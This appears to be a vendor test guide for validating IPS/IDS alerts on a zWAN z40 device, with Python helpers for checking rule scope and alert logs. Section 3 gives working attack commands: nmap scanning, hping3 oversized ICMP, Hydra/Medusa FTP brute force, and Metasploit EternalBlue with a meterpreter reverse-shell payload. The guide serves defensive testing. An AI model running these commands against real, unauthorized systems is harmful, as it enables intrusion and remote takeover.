Intrusion Prevention System (IPS) / Intrusion Detection System (IDS) Testing

Objective

Validate that IPS/IDS features on the zWAN device are properly configured, enabled, and capable of detecting and alerting on a variety of simulated malicious activities using free, widely available tools on both Linux and Windows test clients.

Prerequisites

Admin access to the zWAN Director UI (or local UI) managing the z40 device.

Test client machines connected on the z40 LAN (wired or Wi-Fi).

IPS/IDS enabled and signature repository configured in the Director.

Authorized testing environment and permission to conduct security testing.

Test Setup and Configuration

1. Enable IPS/IDS and Configure Network Settings & Policy Priorities

Log in to the zWAN Director UI.

Navigate: Edge Controllers > [Your z40 Device] > Security > IPS/IDS > Configuration tab.

Toggle the Enabled switch to ON.

In the Networking section:

– Enter the LAN subnet(s) in the HOME NET field (e.g., 192.168.1.0/24).

– Enter the EXTERNAL NET as !$HOME_NET to include all networks outside the LAN.

– Click the Save button to save network settings.

Under Policy Priorities, toggle Drop for:

– High Priority Attacks

– Medium Priority Attacks

– Low Priority Attacks (optional)

Click Activate Changes to apply the configuration.

2. Add IPS Signature Repository

Still under the Configuration tab, click Add Repository.

For URL, enter: https://rules.emergingthreats.net/open/suricata-5.0.0/emerging.rules.tar.gz

Add a description (e.g., “Emerging Threats Rules”).

Enable the repository toggle and click Add.

Click Activate Changes again to download and apply signatures.
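Because the test clients sit on the z40 LAN, a test aimed at another LAN host is a HOME_NET-to-HOME_NET flow and will not match the many Emerging Threats rules scoped "$EXTERNAL_NET any -> $HOME_NET any"; such tests only produce alerts from rules whose source scope includes the LAN. The script below is an added example, not part of this procedure or the zWAN product: it parses a Suricata-syntax rule (a constructed sample, not one from the feed) and reports whether a planned test flow falls inside its address scope under the HOME_NET and EXTERNAL_NET values from step 1. The 192.168.1.0/24 prefix is the page's example value and is assumed here.

```python
import ipaddress
import re

# Networking settings as entered in step 1; the LAN prefix is the page's example value.
HOME_NET = ["192.168.1.0/24"]
EXTERNAL_NET = "!$HOME_NET"

# Constructed sample rule in Suricata syntax (not taken from the Emerging Threats feed).
SAMPLE_RULE = ('alert tcp $EXTERNAL_NET any -> $HOME_NET 21 '
               '(msg:"EXAMPLE FTP brute force attempt"; '
               'classtype:attempted-admin; sid:9000001; rev:1;)')

HEADER = re.compile(r'(\w+)\s+(\w+)\s+(\S+)\s+(\S+)\s+(->|<>)\s+(\S+)\s+(\S+)\s*\((.*)\)\s*$')


def parse_rule(rule):
    """Split a rule into its header fields plus the msg/classtype/sid/rev options."""
    m = HEADER.match(rule)
    if not m:
        raise ValueError("unrecognised rule syntax")
    action, proto, src, sport, direction, dst, dport, opts = m.groups()
    r = {"action": action, "proto": proto, "src": src, "sport": sport,
         "direction": direction, "dst": dst, "dport": dport}
    for key, val in re.findall(r'(\w+):"?([^";]*)"?;', opts):
        r[key] = val
    return r


def in_scope(var, ip):
    """Resolve any / $HOME_NET / !$HOME_NET / $EXTERNAL_NET / a CIDR against one address."""
    if var == "any":
        return True
    addr = ipaddress.ip_address(ip)
    negate = var.startswith("!")
    name = var.lstrip("!")
    if name == "$HOME_NET":
        hit = any(addr in ipaddress.ip_network(n) for n in HOME_NET)
    elif name == "$EXTERNAL_NET":
        hit = in_scope(EXTERNAL_NET, ip)   # EXTERNAL_NET is itself defined in terms of HOME_NET
    else:
        hit = addr in ipaddress.ip_network(name)
    return not hit if negate else hit


def rule_covers_flow(rule, src_ip, dst_ip):
    """True if the rule's address scope (ports ignored) includes a src_ip -> dst_ip flow."""
    r = parse_rule(rule)
    forward = in_scope(r["src"], src_ip) and in_scope(r["dst"], dst_ip)
    if r["direction"] == "<>":
        return forward or (in_scope(r["src"], dst_ip) and in_scope(r["dst"], src_ip))
    return forward
```

A LAN client (192.168.1.20) testing a LAN host (192.168.1.10) is reported as out of scope for the sample rule, while the same test from an address outside HOME_NET is in scope.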

3. Generate IPS Alerts Using Free Tools

Safety and Legal Disclaimer:

  • Only perform tests in controlled, authorized environments such as your POC or lab setups.
  • Obtain explicit permission to run active or intrusive tests against all targets.
  • Avoid any impact on production networks or unintended targets.
  • Use non-destructive payloads where possible and be prepared to halt tests if issues arise.
  • Respect all laws and organizational policies related to penetration testing and network scanning.

A. Nmap Network Scan (Reconnaissance Detection)

Nmap performs network discovery and vulnerability scanning, which should trigger IPS detection of scanning activities.

Linux:

sudo apt-get install nmap

nmap -A <target_ip>

Windows:

Download from https://nmap.org/download.html

Open Command Prompt and run:

nmap -A <target_ip>

B. Ping of Death (Malformed ICMP Packets)

This test sends oversized or malformed ICMP packets that IPS systems commonly detect.

Linux:

sudo apt-get install hping3

sudo hping3 --icmp --data 65500 <target_ip>

Windows:

Use the built-in ping with a large packet size (max 65500 bytes):

ping -l 65500 <target_ip>

Note: Windows ping may not generate perfectly malformed packets but can still trigger alerts.

C. SQL Injection Test (Web Application Vulnerability)

Linux & Windows:

Download OWASP ZAP: https://www.zaproxy.org/download/

Run OWASP ZAP, enter the target web app URL, and start an Active Scan to generate SQLi test traffic.

D. FTP Brute Force Test

Linux (Hydra):

sudo apt-get install hydra

hydra -l testuser -P /usr/share/wordlists/rockyou.txt ftp://<target_ip>

Windows (Medusa):

  1. Download Medusa for Windows from a reputable source (e.g., GitHub forks https://github.com/jmk-foofus/medusa).
  2. Extract contents to C:\medusa\.
  3. Prepare username file (e.g., user.txt) with target usernames (e.g., testuser).
  4. Prepare password list file (e.g., rockyou.txt).
  5. Open Command Prompt and navigate: cd C:\medusa\
  6. Run Medusa:

medusa.exe -h <target_ip> -u testuser -P rockyou.txt -M ftp -t 4

E. Metasploit Exploit Simulation

Linux:

sudo apt update

sudo apt install metasploit-framework

msfconsole

Windows:

Download from Rapid7 https://www.rapid7.com/products/metasploit/download/ and install.

Launch Metasploit Console.

Run SMB Exploit:

search smb

use exploit/windows/smb/ms17_010_eternalblue

set RHOSTS <target_ip>

set PAYLOAD windows/x64/meterpreter/reverse_tcp

set LHOST <your_ip>

check

exploit

Note: Use only in authorized test environments.

Alternative, less intrusive auxiliary module:

use auxiliary/scanner/icmp/icmp_sweep

set RHOSTS <target_subnet>

run

4. View IPS Alerts

In zWAN Director UI, navigate to IPS/IDS > Alerts tab.

Verify alerts show details including:

– Timestamp

– Priority

– Class

– Source and destination IPs and ports

– Signature ID (SID)

– Signature description

5. Review Logs

Use Analytics > Statistics > Logs and Events tab for detailed IPS logs.

Validation Criteria

IPS/IDS enabled with correct network scopes.

Signature repository active and updated.

Alerts generated for all simulated malicious traffic scenarios.

Alerts contain actionable details for forensic analysis.
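To check these criteria against exported alert data rather than by eye, the following script (added here as an example; not part of this procedure or the zWAN product) loads alert records, confirms each carries the detail fields listed in step 4, and reports which step 3 scenarios produced no alert at all. It assumes the exported IPS log is in Suricata EVE JSON format (one JSON object per line, as produced by the Suricata engine the rule repository targets) and that each scenario can be recognised by a keyword in the signature text; the log lines, signature names and SIDs are constructed for this example.

```python
import json
from datetime import datetime

# Constructed EVE JSON lines for this example; not captured from a z40. Assumption: the
# exported IPS log follows Suricata's EVE format. Severity 1 is the highest priority.
SAMPLE_LOG = """\
{"timestamp":"2024-05-01T10:15:02.123456+0000","event_type":"alert","src_ip":"192.168.1.50","src_port":44123,"dest_ip":"192.168.1.10","dest_port":21,"proto":"TCP","alert":{"signature_id":9000001,"signature":"EXAMPLE FTP brute force attempt","category":"Attempted Administrator Privilege Gain","severity":2}}
{"timestamp":"2024-05-01T10:16:40.000001+0000","event_type":"alert","src_ip":"192.168.1.50","src_port":0,"dest_ip":"192.168.1.10","dest_port":0,"proto":"ICMP","alert":{"signature_id":9000002,"signature":"EXAMPLE ICMP oversized echo request","category":"Attempted Information Leak","severity":2}}
{"timestamp":"2024-05-01T10:17:01.500000+0000","event_type":"flow","src_ip":"192.168.1.50","dest_ip":"192.168.1.10","proto":"TCP"}
{"timestamp":"2024-05-01T10:18:00.000000+0000","event_type":"alert","src_ip":"192.168.1.50","src_port":50000,"dest_ip":"192.168.1.10","dest_port":80,"proto":"TCP","alert":{"signature_id":9000003,"signature":"EXAMPLE WEB SQL injection in URI","category":"Web Application Attack","severity":1}}
"""

# Keyword expected in the signature text for each step 3 scenario (assumed mapping).
SCENARIOS = {"A nmap scan": "NMAP", "B ICMP": "ICMP", "C SQLi": "SQL",
             "D FTP brute force": "FTP", "E SMB exploit": "SMB"}
# Detail fields from step 4: timestamp, priority (severity), class (category),
# source/destination IPs and ports, SID and signature description.
REQUIRED = ["timestamp", "src_ip", "src_port", "dest_ip", "dest_port"]
REQUIRED_ALERT = ["severity", "category", "signature_id", "signature"]


def load_alerts(text):
    """Return only the event_type == alert records from an EVE JSON log."""
    recs = [json.loads(line) for line in text.splitlines() if line.strip()]
    return [r for r in recs if r.get("event_type") == "alert"]


def missing_fields(rec):
    """List the step 4 detail fields that are absent or unparseable in one record."""
    missing = [f for f in REQUIRED if f not in rec]
    missing += ["alert." + f for f in REQUIRED_ALERT if f not in rec.get("alert", {})]
    try:
        datetime.strptime(rec["timestamp"], "%Y-%m-%dT%H:%M:%S.%f%z")
    except (KeyError, ValueError):
        missing.append("timestamp(format)")
    return missing


def scenario_coverage(alerts):
    """Map each scenario to the SIDs that fired for it; an empty list means no alert."""
    cov = {name: [] for name in SCENARIOS}
    for a in alerts:
        sig = a["alert"]["signature"].upper()
        for name, keyword in SCENARIOS.items():
            if keyword in sig:
                cov[name].append(a["alert"]["signature_id"])
    return cov


def untested(cov):
    """Scenarios that produced no alert, i.e. criteria not yet met."""
    return sorted(name for name, sids in cov.items() if not sids)
```

With the constructed sample the nmap and SMB scenarios come back as untested, which is the signal to re-run those steps or check rule scope before signing off.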

Safety & Legal Reminders:

  • Perform tests only in authorized lab or POC environments.
  • Obtain explicit permission before running intrusive scans or exploits.
  • Avoid any tests on production or unapproved networks.
  • Use non-destructive payloads when possible.
  • Have a rollback plan and monitor systems for unexpected behavior.